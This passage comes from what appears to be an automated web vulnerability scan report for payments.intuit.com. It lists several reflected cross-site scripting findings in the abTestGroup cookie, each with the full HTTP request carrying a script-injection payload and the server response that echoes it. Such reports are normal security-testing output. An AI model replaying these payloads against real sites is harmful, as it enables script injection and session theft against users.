Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1666866"><script>alert(1)</script>32afa1f3f6c;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zRzKl+MSVxM+3HdgcANKFg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F946E0A0805192AA117E332CBAC17
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140401

...[SNIP]...
<input id="testGroup" value="T1666866"><script>alert(1)</script>32afa1f3f6c" type="hidden" />
...[SNIP]...

1.99. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d3b88<script>alert(1)</script>6e2a002a14f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d3b88<script>alert(1)</script>6e2a002a14f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=L-zz2dNUext+4Q-KcuN0bQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FEAFE0A0805192AA117E37B6CBEAF
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100552

...[SNIP]...
<br />
       A/B Test Group: T16d3b88<script>alert(1)</script>6e2a002a14f<br />
...[SNIP]...

1.100. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d02"><script>alert(1)</script>94241c27c76 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1619d02"><script>alert(1)</script>94241c27c76;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:36 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=yWSAZf5c4xcytMMezhM63w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:37 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E404B0A0805192AA117E37069D512
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100565

...[SNIP]...
<input id="testGroup" value="T1619d02"><script>alert(1)</script>94241c27c76" type="hidden" />
...[SNIP]...

1.101. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5f4"><script>alert(1)</script>87efd050621 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T168d5f4"><script>alert(1)</script>87efd050621;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=n19gPeGfvwyyWV29gPb8Ng**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D2E3B0A0805192AA117E3AF226B64
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100565


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<input id="testGroup" value="T168d5f4"><script>alert(1)</script>87efd050621" type="hidden" />
...[SNIP]...

1.102. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 62983<script>alert(1)</script>3ae0052e269 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1662983<script>alert(1)</script>3ae0052e269;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:35 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=7oJ44ylVUt+Li-Z7PXRP7Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:36 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F28BD0A0805192AA117E37695A7D1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100552


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<br />
       A/B Test Group: T1662983<script>alert(1)</script>3ae0052e269<br />
...[SNIP]...

1.103. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 666da<script>alert(1)</script>b41e58df354 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16666da<script>alert(1)</script>b41e58df354;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Z1BCpO0dBLLog6V8f1FTVA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961387A0A0805192AA117E3832F3F96
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145463


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16666da<script>alert(1)</script>b41e58df354<br />
...[SNIP]...

1.104. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d083f"><script>alert(1)</script>9f3ce87ff72 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d083f"><script>alert(1)</script>9f3ce87ff72;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=PqWIbcT8+tXNj3N5AL2viQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FB2030A0805192AA117E3D6C05D05
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145475


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16d083f"><script>alert(1)</script>9f3ce87ff72" type="hidden" />
...[SNIP]...

1.105. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237a8"><script>alert(1)</script>3c9a92fa8e4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
